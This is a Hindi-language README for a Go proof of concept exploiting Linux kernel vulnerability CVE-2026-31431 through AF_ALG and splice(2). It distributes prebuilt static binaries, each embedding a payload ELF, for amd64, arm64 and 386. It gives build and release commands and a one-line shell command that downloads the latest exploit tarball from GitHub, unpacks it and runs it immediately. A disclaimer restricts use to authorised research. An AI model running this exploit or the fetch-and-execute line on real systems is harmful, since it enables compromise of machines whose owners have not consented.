
# CVE-2026-31431 के लिए स्थिर Go प्रूफ-ऑफ-कॉन्सेप्ट यह Linux AF_ALG और splice(2) का उपयोग करके भेद्यता को ट्रिगर करता है। amd64, arm64, और 386 के लिए पूर्व-निर्मित बाइनरी प्रदान करता है।
इस रिपॉजिटरी में theori-io/copy-fail-CVE-2026-31431 से सार्वजनिक Python प्रूफ ऑफ कॉन्सेप्ट का Go पोर्ट शामिल है।
यह प्रोग्राम केवल Linux के लिए है। यह मूल PoC के व्यवहार को संरक्षित रखते हुए एक छोटे स्टैटिक Go बाइनरी के रूप में बनाने के लिए Linux AF_ALG इंटरफेस, AEAD कंट्रोल संदेशों और splice(2) का उपयोग करता है।
रिलीज़ बिल्ड निम्नलिखित के लिए तैयार किए जाते हैं:
linux/amd64linux/arm64linux/386प्रत्येक बाइनरी में समान टारगेट आर्किटेक्चर के लिए एक पेलोड ELF एम्बेडेड होता है।
macOS और Windows बिल्ड जानबूझकर प्रकाशित नहीं किए जाते हैं क्योंकि PoC Linux-विशिष्ट कर्नेल इंटरफेस पर निर्भर करता है।
टैग की गई रिलीज़ संपीड़ित स्टैटिक बाइनरी और एक चेकसम मैनिफेस्ट प्रकाशित करती हैं:
copy-fail-poc-linux-amd64.tar.gzcopy-fail-poc-linux-arm64.tar.gzcopy-fail-poc-linux-386.tar.gzSHA256SUMSडाउनलोड किए गए आर्टिफैक्ट को सत्यापित करें:
sha256sum -c SHA256SUMS
आवश्यकताएँ:
वर्तमान होस्ट आर्किटेक्चर बनाएं:
CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc ./cmd/copy-fail-poc
Linux टारगेट के लिए क्रॉस-बिल्ड करें:
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc-linux-amd64 ./cmd/copy-fail-poc
समर्थित GOARCH मान amd64, arm64 और 386 हैं।
टेस्ट चलाएं:
go test ./...
go vet ./...
टेस्ट केवल गैर-विनाशकारी हेल्पर लॉजिक को कवर करते हैं। वे PoC ट्रिगर पथ को निष्पादित नहीं करते हैं।
अपने स्वामित्व वाले या स्पष्ट रूप से परीक्षण करने के लिए अधिकृत Linux सिस्टम पर बाइनरी चलाएं:
./copy-fail-poc-linux-*
एक-लाइन रिलीज़ डाउनलोड और रन:
sh -c 'set -e; case "$(uname -m)" in x86_64) a=amd64;; aarch64|arm64) a=arm64;; i386|i686) a=386;; *) echo "unsupported arch: $(uname -m)" >&2; exit 1;; esac; curl -fsSL "https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC/releases/latest/download/copy-fail-poc-linux-${a}.tar.gz" | tar xz; ./copy-fail-poc-linux-${a}'
व्यवहार टारगेट कर्नेल और स्थानीय सिस्टम कॉन्फ़िगरेशन पर निर्भर करता है। बाइनरी हर Linux सिस्टम पर सफल शोषण की गारंटी नहीं देता है।
GitHub Actions वर्कफ़्लो v* से मेल खाने वाले टैग पर चलता है और Actions टैब से मैन्युअल रूप से भी शुरू किया जा सकता है।
रिलीज़ बनाएं:
git tag v0.1.0
git push origin v0.1.0
टैग बिल्ड के लिए, वर्कफ़्लो एक GitHub रिलीज़ बनाता है और Linux आर्टिफैक्ट्स के साथ SHA256SUMS अपलोड करता है। मैन्युअल रन के लिए, आर्टिफैक्ट वर्कफ़्लो रन से उपलब्ध होते हैं।
यह प्रोजेक्ट केवल अधिकृत सुरक्षा अनुसंधान, रक्षात्मक सत्यापन और शैक्षिक समीक्षा के लिए प्रदान किया गया है। इसे उन सिस्टमों पर न चलाएं जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। सभी लागू कानूनों, अनुबंधों और नीतियों का पालन करने की जिम्मेदारी आपकी है।
theori-io/copy-fail-CVE-2026-31431